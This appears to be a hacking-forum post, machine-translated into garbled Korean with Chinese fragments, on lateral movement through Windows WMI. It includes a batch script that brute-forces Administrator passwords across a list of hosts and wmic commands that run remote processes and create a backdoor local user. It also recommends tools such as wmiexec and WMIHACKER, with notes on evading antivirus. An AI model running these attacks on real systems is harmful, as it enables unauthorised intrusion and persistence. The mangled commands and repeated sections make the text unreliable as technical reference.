KoreanHackerTeam
Moderator
WMI 기반 측면 이동
포트 135는 필터링되지 않았다 [默认配置下目标主机防火墙开启将无法连接]
※ 다음은 단일 비밀번호 폭발입니다. 여러 가지 암호 폭발을 폭파 해야하는 경우 IPC 옆에있는 기사에 따라 수평으로 이동하여 수정할 수 있습니다.
坑点:需注意特殊字符,如密码中有 % 需要用 % 来转义,例 :123#$% 应转化为 123#$%%
1234567891011@echo offclsecho Useage:%0 ip.txtfor /f %% I in (%1) do (echo wmic /node: %% I /user: '%% I \ Administrator' /password3360'123456 '프로세스 목록. Txtwmic /node: /user: '%% I \ Administrator' /Password:'123456 '프로세스 목록 브리프 NUL NUL 2NULIF ERRERLEVEL==0 (ECHO 성공 : %% I PIC.TXT)) ECO END END.TXT
wmiexec.vbs는 WMIC의 명령을 반향 할 수없는 것을 해결하기 위해 개발 된 도구입니다. 원칙은 데이터를 임시 파일에 먼저 저장하고 각각 실행 결과를 읽은 후에 자동으로 삭제하는 것입니다. "실행 명령"의 결과를 반영하고 "반 인터랙티브 쉘"을 얻는 데 사용될 수 있습니다.
1cscript wmiexec.vbs /cmd 192.168.1.1 관리자 테스트@123 Whoami
단점 : 대상의 445, 135 및 다른 임의 포트를 차지하는 WMI 서비스를 호출해야합니다.
참조 사용 : 도메인 침투 ——은 해시 구현 (3gstudent.github.io)
장점 : 포트 139 및 포트 445가 아닌 포트 135에만 의존합니다.
단점 : 현재 512KB 미만의 파일 만 업로드하는 것이 지원됩니다. 각 값을 재설정하는 길이는 512KB를 초과 할 수 없기 때문입니다. 명령 실행 및 파일 업로드 파일은 모두powershell(被360拦截了)https://github.com/qax-a-team/sharpwmi에 따라 다릅니다.
github.com
이것은 포트 135를 기반으로 수평으로 이동하는 도구입니다. 명령을 실행하고 파일을 업로드하는 기능이 있습니다. WMI를 통해 명령을 실행하고 레지스트리를 통해 데이터를 전송합니다.
중요 : 지원 PTH-https://github.com/360-linton-lab/wmihacker/issues/1
주요 함수 : 1. 명령 실행; 2. 파일 업로드; 3. 파일 다운로드
github.com
대상 포트
대상 시스템
사용 튜토리얼
WMI 폭발
포트 135
창
wmi-ntlmhash 폭발
포트 135
창
wmiexec (권장)
포트 135
창
단지 포트 135는 445에 의존하고 파워 쉘에 의존하지 않는 점차 또는 기타 도구와 달리 레지스트리를 통해 반향됩니다.
WMIEXEC2
포트 135
창
WMIEXEC과 마찬가지로 포트 135만이 레지스트리를 통해 에코를 가져야하지만 PowerShell에 의존하면 PowerShell이없는 대상은 적용되지 않을 수 있습니다.
github.com
github.com
WMI 介绍
WMI의 전체 이름은 Windows Management Instrumentation입니다. 모든 Windows 운영 체제에 나타나며 로컬 또는 원격 Windows 시스템을 관리하는 강력한 도구 세트로 구성됩니다. 공격자는 WMI를 사용하여 공격하지만 Windows 시스템은 기본적으로 이러한 작업을 로그에 기록하지 않습니다. 로그가 없을 수 있습니다. 공격 스크립트를 디스크에 기록 할 필요는 없으므로 은폐가 증가합니다. 원격 명령 실행에 WMIC를 사용하는 것이 좋습니다.WMI 利用条件
원격 서버 시작 Windows Management Instrumentation Service (기본적으로)포트 135는 필터링되지 않았다 [默认配置下目标主机防火墙开启将无法连接]
连接失败常见错误号:
123456789101112131415161718192021221. 공유 허용 예외 오류 : 코드=0x800706BA 설명=RPC 서버는 사용할 수 없습니다. 장치=Win322. 오류 : 그룹 정책을 차단하는 경우 Code AdministrativeStraotr 원격 액세스=0x80070005 설명=액세스 거부. 장치=win323.ip 보안 정책 블록 135 오류 : 코드=0x800706BA 설명=RPC 서버를 사용할 수 없습니다. 장치=Win324. 오류 : WinMGMT 서비스를 비활성화 할 때 코드=0x80070422 설명=비활성화되거나 관련 장치가 시작되지 않았기 때문에 서비스를 시작할 수 없습니다. 장치=Win325. WBEM 디렉토리 권한이 거부되고 WMIC를 사용할 수 없습니다 .利用 wmic 进行横向移动
常用系统自带命令
123456781. 원격 호스트 프로세스 목록 WMIC /Node:192.168.1.1 /user:192.168.1.1.1\ Administrator /PasseStrator! BAT 스크립트 WMIC /NODE:192.168.1.1 /USER:192.168.1.1.1.14ADMINISTRARTR /PASSOFICE:0!@#123QWE 프로세스 호출 C: \ ProgramData \ Test.bat3 작성. 원격 시스템에서 단일 명령을 실행합니다 WMIC /NODE:192.168.1.1 /USER:192.168.1.1.1.1.1.1.1.1 \ ADMINISTRART /PASSOFFER:0!@#123QWE 프로세스 CALL CREATE 'CMD.EXE /C NET 사용자 TEST1!@#123QWE /ADD NET LOCALGROUT TEST1 /ADD NET LOCALGROUT TEST1/https://www.cnblogs.com/0xdd/p/11393392.html批量爆破
연습 후 WMI의 폭파는 3 개 이상의 오류가 발생합니다. 360은 [소프트 킬이 없을 때 테스트 없음]을 가로 채며 로그는 원격 RDP 폭발이며 WMI의 연결이 일시적으로 제한됩니다.※ 다음은 단일 비밀번호 폭발입니다. 여러 가지 암호 폭발을 폭파 해야하는 경우 IPC 옆에있는 기사에 따라 수평으로 이동하여 수정할 수 있습니다.
坑点:需注意特殊字符,如密码中有 % 需要用 % 来转义,例 :123#$% 应转化为 123#$%%
1234567891011@echo offclsecho Useage:%0 ip.txtfor /f %% I in (%1) do (echo wmic /node: %% I /user: '%% I \ Administrator' /password3360'123456 '프로세스 목록. Txtwmic /node: /user: '%% I \ Administrator' /Password:'123456 '프로세스 목록 브리프 NUL NUL 2NULIF ERRERLEVEL==0 (ECHO 성공 : %% I PIC.TXT)) ECO END END.TXT
利用工具
wmiexec.vbs
사용하지 않았습니다.wmiexec.vbs는 WMIC의 명령을 반향 할 수없는 것을 해결하기 위해 개발 된 도구입니다. 원칙은 데이터를 임시 파일에 먼저 저장하고 각각 실행 결과를 읽은 후에 자동으로 삭제하는 것입니다. "실행 명령"의 결과를 반영하고 "반 인터랙티브 쉘"을 얻는 데 사용될 수 있습니다.
1cscript wmiexec.vbs /cmd 192.168.1.1 관리자 테스트@123 Whoami
impacket-wmiexec
장점 : 지원 PTH단점 : 대상의 445, 135 및 다른 임의 포트를 차지하는 WMI 서비스를 호출해야합니다.
참조 사용 : 도메인 침투 ——은 해시 구현 (3gstudent.github.io)
sharpwmi
포트 135를 기반으로 수평으로 이동하는 도구입니다. 명령을 실행하고 파일을 업로드하는 기능이 있습니다. WMI를 통해 명령을 실행하고 통화를 통해 데이터를 전송합니다.장점 : 포트 139 및 포트 445가 아닌 포트 135에만 의존합니다.
단점 : 현재 512KB 미만의 파일 만 업로드하는 것이 지원됩니다. 각 값을 재설정하는 길이는 512KB를 초과 할 수 없기 때문입니다. 명령 실행 및 파일 업로드 파일은 모두powershell(被360拦截了)https://github.com/qax-a-team/sharpwmi에 따라 다릅니다.
sharpwmi(修改版)
GitHub - idiotc4t/sharpwmi: (批量化改造)sharpwmi是一个基于rpc的横向移动工具,具有上传文件和执行命令功能。
(批量化改造)sharpwmi是一个基于rpc的横向移动工具,具有上传文件和执行命令功能。. Contribute to idiotc4t/sharpwmi development by creating an account on GitHub.
github.com
WMIHACKER(推荐)
수평 침투의 원격 명령 실행은 서비스를 작성하거나 win32_process.create execution 명령을 호출하는 것입니다. 이러한 방법은 SWSW.CKER 수평 이동 테스트 도구에 의해 100% 가로 채기 시작했습니다. 서비스를 작성하거나 Win32_Process.create execution 명령을 호출하는 것입니다. (포트 139 및 포트 445가 아닌 포트 135에만 의존)중요 : 지원 PTH-https://github.com/360-linton-lab/wmihacker/issues/1
주요 함수 : 1. 명령 실행; 2. 파일 업로드; 3. 파일 다운로드
GitHub - rootclay/WMIHACKER: A Bypass Anti-virus Software Lateral Movement Command Execution Tool
A Bypass Anti-virus Software Lateral Movement Command Execution Tool - rootclay/WMIHACKER
github.com
Ladon
모듈 기능대상 포트
대상 시스템
사용 튜토리얼
WMI 폭발
포트 135
창
wmi-ntlmhash 폭발
포트 135
창
wmiexec (권장)
포트 135
창
단지 포트 135는 445에 의존하고 파워 쉘에 의존하지 않는 점차 또는 기타 도구와 달리 레지스트리를 통해 반향됩니다.
WMIEXEC2
포트 135
창
WMIEXEC과 마찬가지로 포트 135만이 레지스트리를 통해 에코를 가져야하지만 PowerShell에 의존하면 PowerShell이없는 대상은 적용되지 않을 수 있습니다.
Sharp-WMIExec
은 사용되지 않았으며 아직 테스트되지 않았습니다GitHub - checkymander/Sharp-WMIExec
Contribute to checkymander/Sharp-WMIExec development by creating an account on GitHub.
github.com
WMIcmd
은 사용되지 않았으며 아직 테스트되지 않았습니다GitHub - nccgroup/WMIcmd: A command shell wrapper using only WMI for Microsoft Windows
A command shell wrapper using only WMI for Microsoft Windows - nccgroup/WMIcmd
github.com